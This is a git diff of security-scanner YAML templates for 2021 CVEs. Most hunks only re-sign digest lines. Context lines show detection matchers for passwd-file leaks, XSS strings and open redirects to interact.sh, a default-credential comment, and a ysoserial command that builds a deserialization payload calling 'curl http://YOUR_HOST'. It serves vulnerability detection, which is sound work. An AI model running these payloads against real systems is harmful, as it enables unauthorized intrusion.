490a0046304402203303c820251e0cd859a14dd350583f6e8616a59b8a66925eef706ee0ddc58d1c0220732dd05cb178fbaf2c7443df6870edc0f278269f46d4509ad681d53ac5b60a4e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e88a87915b50665b793e01a171fac9b0e0347dcfae5befa28676e4c3105e279402200d28730eb59c8e54552cd3599c6c0cc9282b1f77dee5a9c19a33bea949b5e6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index 65e5194e45..37ab8c4d8c 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022074e1cfa7f91f4fad251e0454dee910b502a5dab72e43e3ca3f1f3640633bacee022005f184e0c54df2de53b3e498b8f1e12b9c7409fd01ae3b4f16971dd7660d8c66:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d7544c8cc56ac262d3c502ce8d8a4c5fbf24acc9e8c6e14fbadac3189b71b495022055a6613d0c04142237a21d2d15c35d8df0aaba16316edb9cd39b00d8d377c88b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 951eaf4854..214be2e4f8 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -44,5 +44,4 @@ http: part: interactsh_request words: - "User-Agent: Wget" - -# digest: 4a0a004730450221008cc28b5157c6931e6676ce850289d29293f7d49637c343fa61e3c1a1828d663c022065aad78c6860c815f2a705ed4330e48d0bd256d43b16fa653e6fa6f084fcb532:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220029b0493c1d415ea5b1719f87ee9bea3845978dc23cddc4875621a3ae7f0525d022100a48d9953308c5e069d6ba4518ae9b43d917cc2def868176977f019c585fc7f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 216faa8d9f..a0ec8e7644 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fbd7d59f8ece9b72e8a0c58ff02c77e36fe0f745ad6de5cd3e505be4b4461b5f022100856d964f3d265ec414cd65010e9107d86c180f2e1eb6b7ad9a17dd3013312584:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a38f15715a045b3f8f710ae17e49ab8c4a13a9059ba2edee265844c5c6c9dcb022100813e7c75a95c738bc515cff51efbe14bb508dffc8c45ab6e6ca84c8f8d34e2e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 8100864816..c259ca3416 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203cf0aecad3d236c57b86d4e2c452f5f23b6b72aeb4afa98be5b84cdd1080690c022100bab691323ac1b6082786d2d2b132fbe1939f94383123066b2dec3f754f6e4f65:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220551791f06359e9f35aab2d7523815513c909d139a6ae9016ae01d3148548cc94022012254a2d44e680eb41a01e43db8b5d67940abac4dd8447fa38c4d0b549b08b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 9ca5f8c68a..71c551941d 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203e7580186f942e920657bc3cfccbca6d0219972161bb5916da4df7fe6accf09c02210088a3d5173dab007a2dd7c148dcf90ab2a481411a01591dff96d53564baf079fa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096364580803fe0ec73fdc35ade75cd9168412b30d5172dc4bac1db142bcdf1ba02203fb642848b055a152986d0e2431911dd54b011b217bd1ad5f7f620778fe88735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 6afd478f17..0004cecb54 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ebee80614f6d4bb2b6013cc768855573651dc5a90cfab179f9b924eed6eab882022020e9848dea116986b7908f31f9c779980e881c0f8f1fe4f2e1aebae1fa70272d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d6376f8643c8785212b673df47aef1d3dcc0c296a79eeec046bb99d4964d29f022100d2320559e055c7e01cace506d1fb74b1ad95bd12de0f87958bea4c4b87ca121a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 8b60c75e94..aa93406aad 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -61,5 +61,4 @@ http: regex: - ',"result":true,"session":"([a-z]+)"\}' part: body - -# digest: 4a0a004730450221008c61786a944987ced525c8dfc64ba93ec24099a57ac81bdb46186838765560b3022052757b78b8168366c0f904134a7e693384b090a6627f4d532c3cf1a1f17450be:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a429fae91c72b850483aa2d1112a7bd9d7c0599b364d7aa0b22cb573f1d9fd15022100c9712b831749d755eeffa422466046ec68747dc25e671d870c44238718ed5b03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 711fe4be88..18bbdeb6b6 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009c498779dd22a7503444a2bc76f02ca6d4dced41f1d0b44bbb6c5bf7714e8ff8022019d1a78b77c2810def5dbbcb3e3dc30f8479b2098942410dad76faf86ff548dd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1b907f69aa3d111bff1494442bffe6b2dce104768f9dc76b4415da53eac7eaf02203b9cef62fe04a1b7f2512cc1772aa24d9844c26f2316304d87af7cef58019e29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index a0ef2bf9ce..eb2eb3a4f2 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a2d39de8ef037cba882350bc2f279d7da8980c51d16c0f44f4a2087a7057c4f4022100d51fb95e501e04d618b107948902edfecfe117c4f2e056a7d2974bd8de0a5e19:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d3a898846cd39f11ff4ed8c8ab6760aea51c9583750aee9324c60fafc6256083022100d8b0bf23633950898da02104a83137a6d1cf300f2790301af03dbca7e1e68c68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index b3cf873f2e..3316c01bd5 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220147632520b6b7983da6b9495945fc17cde275dc1ff68b4c6e09ed5320af2e9e00221009dfd80c549fe4511afbd1526254d01838943fec478b2eb48ceb8aaa64183ce8d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203571e4dc5ba290c001f58e5e5e3008764a181f0cf8b4ff4533c77f52a7111356022100d7233e4d5fb066b3a800013f0b35b46e3d0386d3b642cce64e2f38e0a734cffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index d716f2ae68..8e7b100398 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -44,5 +44,4 @@ http: - type: word words: - "sh\"/onmouseover=\"alert(1)\">" - -# digest: 490a004630440220237fba4a8952fb56f2476a5dd17da4f884adc04ce2e8563c76fbf94942e4f00002207f4307f0d3695e44efd394668d01ac37793015612333783d8227cbc15ffac329:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220585e95b18c01935410a08ac12853a60efa674c6f6476fe559c38a149b1195e39022100e479f69b32dcd1913a5371052dcf2778f1ff137731baf8c68fd467b027620a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index fb1ce4fc0c..38936dd3f6 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022067fe94988e74c69a1306e7be4925757ac901c3ee3f0fcbf7bb512020f0f4058a022100aa22e1d43ddba099bebf8496f8855c04872a696f7ec1a518d372ec5832db1dcb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203cbf8b831f74416c92f330135a366b72737ef01a57e2ac06a17542510908b774022100c78d69d7c58558d938fcd6a2037413ecfdbd1e9ac4641ca628905c992abe6392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 146c35f6ed..0535749b12 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205fe5522779404e97bb8c36efdf6bed138bff68e2f3542a760625e2d3a64e08bc022100c0ef689dc94002ec030e75be63efe0c9965e13972248659e48fcd8a52ac34591:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100824c7296399218fe73fd6b2a6c1bc9d90605fade66c25b0562b1d6a799b858dd022070c747f1a424a1e59c54e8da2f1b5fc7e05ff85dc1687d199173e7948830a7bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index 6e594bd612..a440c167af 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -68,5 +68,4 @@ http: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true part: body - -# digest: 4a0a00473045022100d7bf82ab7c608c4ae0adde81b0b62622f508e0f5160452797401654c8dc3db28022003de4831f60507f04f9271e429ec6ea25e3c7b2f7ce6e06e5e1575b369a0155f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fbbb9b410f021897be2ac6b9ba4ce1a85cbacae1335b73dc29670864793eafa502200f614bc986dda05830ba1452b30db0d67c26f7465eed18cd6db10fcfe947d826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 3d9aa9fbb4..26164e2e2e 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d4aa8196da2af73bbf3b2d2a007cbd9a0e6086b69b056cdfc6e2cfcfd098fa53022100c6714cc62da84837e244e1b2ed3563437012a40377c961b5ce9dbf82705e86c5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d18562ccbaec10065a34623174162f4608dbe7aeec886830555a36ffb49c10c022100d471fa223eed2a12be1610e402db0c59b1bf009e787fc69a1020eca1b7dac081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 801c4a47a8..74557fb761 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a004730450220353ba089354b1e55598d0a92f2f09a9c52f37fd7c7b1b98758dd0a168c791d10022100e6c6b546926fd6415fd06af5b76232cebc73dc06e4083cca7f158aa6caca90b9:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220314a6ba697100f3ed3ee637ed126512292dbd10cb754f730ee982301f7433423022055a3a6d17a02eb1734f609c810a4c942a7b9e87cb40393f60998be6e2c792752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index faec2bdad1..7b6643c716 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -40,5 +40,4 @@ http: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - "Exchange MAPI/HTTP Connectivity Endpoint" condition: or - -# digest: 4a0a00473045022100eedbbbda91f32e8bca169405e6b11d535c9c248169a5758eec4ada8416e4c70a02203a79a8c642475363ca77ce23eb344bfa2e02220bf6b5b81ed4e9ab1767a8ac25:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022077723a696bd98c0d742c53985aecfd90eec715e38a4a2359edb0ec5c00a2f181022100f30482fdae2eb64506cf06b25542a0af8cc82d39f136551b244aa0defc5e1da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 6d2ce685f0..8b3230cf48 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -117,5 +117,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b40360554f98ec561ab6f3818bd15fe8ed6324577ae8019fdc4501a50887e44102203af2a425716ac2938975936d8510108eed3bb2b9ae3718d1549a85fb9cc5f773:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220616439a122e7d5a073779a0c4af5e6c5c83e4003dba9188d2ad66666870c55aa022100d53901d8d402ebd57803f34c2fc2d66787795f391b23f34f3f2dcf6ae88ca295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 0741546853..d5b6120c62 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e0fd6ab70cbd2d5fca892516f8196e34846187b408ced8d08f0264be028327ac022079e0146baaf4bb56bc949efa4b67967714bddb4ff0f9bc6377cc3d889d3f05fb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220570f72547c599de139268d2daaab0513d45e5714820a80cfe4f19a3038690ad3022100cb534946b2a253ecdbd1aac7de0a40c2b7d96d4efa5e724f099c750b649f435c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 8ff871b6be..3c97f33c14 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009a8c3815bbddfedd222646223cb8d8d20b777aa47da897c0e11386740d304f7e022067ff9b2378d741d64a688f352cb008a7329130ac3868172bb42b6f81eb3cba22:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202edc54b8f2b9f197f56626cd6d4d5c363edc1cf115e155337b839f2d18cde78a02207f7c5065671fbbbe6888501117ecdd89a0bdd366434d9debb190064268183cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 770d508138..3ea061931e 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220694b665741dac1995fb2002d7de33ba7e97f69b4ecb4d0804b868da4b268d0e20220440fe2d73d370af789302673aa8e1b6bc2cf305178816a38b7f7bda8ef44aa4c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022027c0acdf7a39ee7fc7e69f52f065be3f6896b956b8a0fda46cefd925b3d7cfe1022100869cae1d067b49e631bb122597231da6a6c6d235b65bc174a0c97c766b4a643d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 1ed0154603..393129cf88 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 401 - -# digest: 4b0a00483046022100fe15310d8236fe9facbe49c26941ffe8c5e0e9f6897a67e8e44cf2c26eee2f65022100b4c2f1fe37e7e030277063afa9adac7c78a45189e3708a8330787584e34c2fab:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8be8beb811df0862845b775de227fc94927947a5bba9aa8e8def06ab81a48fa022100e2bd5db7d9c200c5aece52025394dc691c7ba20ce7a5c0642e287723a6424e1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 4dbcf74ed3..81bdd3cc06 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210089bed91ada43e9cefcc7722fc298bd01367bfb746c704075a390e0ad4ccd9b1e022100d44612098a816f6237869c002d2921f54c0572af9238c41800edb1d34298a79b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200a0dc2a8a12a08f2a25ea344c4c36dcc590a2e884afb25be1b112491a59fbdbd022076d75cc2bc9432679bb1ead81553db143d71499ba46f6bc68298a4c0a42d3454:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index 454607f839..cee4a89654 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -57,5 +57,4 @@ http: regex: - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' internal: true - -# digest: 4a0a00473045022038bc4a49ab734a3993c9121ed0fbde17afa9c7bf9dcd60d76983609530606423022100c0d74aec1ff6e0367cd7daf90d99df76a79b56381594c3231a7e65b9e4887e8b:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220632df61f16fbd62fc593f38ce2003522b6dc9d3a25da71391f3b78eee9260f2d022038be7b586b9e3840d0710da41be2b7a3ccc4f9b72e86d8d1eddd0570d51ddaac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 121bd1638b..fa8e8e46e1 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -51,4 +51,4 @@ http: - 200 # admin:password -# digest: 490a0046304402204e48738f33ab53f5cc7e5823616a74ef0f46d56556e784b1aa5c1276242a1294022001926c59ae396c1f67d527cc4c34d629c3f1239dfc9f78e010a5075166135e96:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022063b1e993c2af81fe4fe4a7373d7acd51ccda0c7ff2aefadfbc64fe6a72a84cbd022100ea1e4c5d4f225a3db6350903e1356ddfc6151dfc6b81aae7458a7709febe1221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index d2035bbbc1..00364b00ab 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -40,5 +40,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4b0a00483046022100cb6eb8d6acb3ff50d83f4006dc9b31dc975cf96fbf186e74fb78a22b2a65361a02210085f72282203d69f56b9166a1cdb4f61fd5101d789cc07b7696892fa4e73fda28:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfee4ba0303284ab093494459cccac78c7d35cde46fff0b451f180b1744e9e4b022100a9ebbc61c9a1a86db2567eb245762a3489389e2951848c1a9a5ec45de21fff39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index b5b0c601e1..2397d87c26 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -57,4 +57,4 @@ http: # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' -# digest: 490a00463044022027b4e1a60c117c49bb8ccc16f66ef3ba29eaccb9ac754e655876433d5c99fd2402200c613fdfa89196685ab514519c628fe7dd33bc23d034511ae9bed0bbb7eba996:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205a97864c94391a6c68a4b0bd7b4ece25aab1fc2475dc42c32c24b18108bdfb95022100f0ca897dff9c3569584d3a47720f43afea6e5502c9f3075a4652ae0b12731dc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 08a4e6da6e..c17a48d9bb 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 401 - -# digest: 4b0a00483046022100b9afafcdc25e0148c0a8ed4650ab6596f1dde4924c4a3a8f46673ad0dec2be940221009e287977d41b6c17dd56390bf17eb4e1a501125bfc3c29a81c5499bedb62b45b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b2144809d487c4f3365ca1983d32b5ad0e0f8d1c7f956f3cccbf213b395d826f02204045ad43d4b3e6026a9bbed4bf5e5db8572791f561d8723b81eb28fe7bdf4b4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index a8d41105dd..dae7a0526f 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e98b7ce762b7f7ef7d464da880d1782e4e89b8d3c626339a341ba821e660ab1102201c086e76c6853d104b572a187fcb235f50baedd113322c3d9e7ceeff6dfc6942:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022041c8eeee78273868b774047d006c939b867f7329fcd8c70e6ffa3846bf715b2a022100d3f17396e082b5023e7ef3ba2d205ee6466c086b40ee0ec4f4b458ba54add9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 6775150eaf..fae0c09fa6 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210091241a75d3315d716ce578346a7d74e5f4e9cde56d38a04cefbfbd96c963627a02203499344ac3f186ea546e35c9def2cbf38f8138e6629112700e820c44b7c4d032:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f2ad94e558455013893bfcf7c5dddb0317da5a903ae1c313b34919401991fc6022100fc87e4731b4ce3ebd4913e796728a4c17b969e81d7b75764d14719e1c4e22a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index ae66db91b7..a6bd30f810 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -48,5 +48,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100c5ee41cd7b08bd5e671377f2efba303d49542396729d27795273e9d9983d23fb022047b64727ca6eec8be0c876105fac79ebf0b63d313e4c79dc63bc0246fe220d49:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022053a16fcb69c82bb5c690388b77e44f6b6c8c3742905787fbe2450ed187240bf6022100c48de29949d0bc11bda7c53d063652afdbc4b1958c1646468ed4c0d566505d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 9764589479..e408f16935 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -51,5 +51,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - -# digest: 4a0a004730450220424b4855a88df8416f2786062fb0a22dd5d1a10295038cfd5f1044008aea302d02210081eb05a077ad56030277c4c7dd068d8a1e5183ac8aaecc09073c2e415af3af98:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100925efb04495b7b0eaeb8c25711014561f6ec10e766160084081bec5406e0d35a022100d744c4c3bce810aebe2802a5a0c1b1b2981c4e9115c2c92ff3b4be51d4732fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 2239d1d5f4..d0fac9f5e8 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -38,5 +38,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 490a0046304402201f8be9b3b7c21e9916b1d38e01e4c3ccf7191ff06d64c6206bf0ab4858d84c1d022021e96f14172a4dab46f0028b13f0cb2e61a4d54691d8126a081588cfabaee1f3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f0f1c71eb7e6cdcb3366384828aede53904a6b9a30516fa5ef598c1e100fd4b402202f2af6333495e5b3931b1610e41c639ad178ec588d08ed9553be7107b0995bab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index db1b1403a0..8eb19fb173 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -68,5 +68,4 @@ http: - 'csrfp_login=([a-zA-Z0-9]+);' internal: true part: header - -# digest: 490a0046304402207b0c38241b0648302460b0f5b2108f60dcb22e6ed401ccfdffb3a763bf93523702204af90ef24f9a16942518dd1551ed2c0d14380b08e2e871a8de7c353b153d7a6d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022049c06c652487163d937126738e1d4965d85caefbf5dd4f36613ed4ab9867528002203304dc980e29e4d08b16816091bfbb964c19acb174a5d4aa05e8e3711042ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index b22cb68dd0..8c998ae773 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -43,5 +43,4 @@ http: status: - 302 - 301 - -# digest: 4a0a0047304502200d762074704c258795cbb3a0da10aaa1f1ea9866bec4fae93e71f0be861cbd36022100c21702638418aeac24b1bac3459a617b64d7c7215ef66b611b9f60afceefde17:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022011be0222188fcf05264db2c66552056a99f36c14ed657f523d9a5994aabf72a6022048038f793d5205330b5072c0db0eceee1789c60dca3daf6b64946e13807a8290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 616cd0fe05..ce2bb0aefc 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a0046304402200b31a569a5e55504b043359f497db21142769c09a7df0e73d08b50bcb866cd1402202cc1ab0ce0b22a387a6d5e099327e3a1e02c584bdffe2737ba968e12f6b719bb:922c64590222798bb761d5b6d8e72950 +# digest: 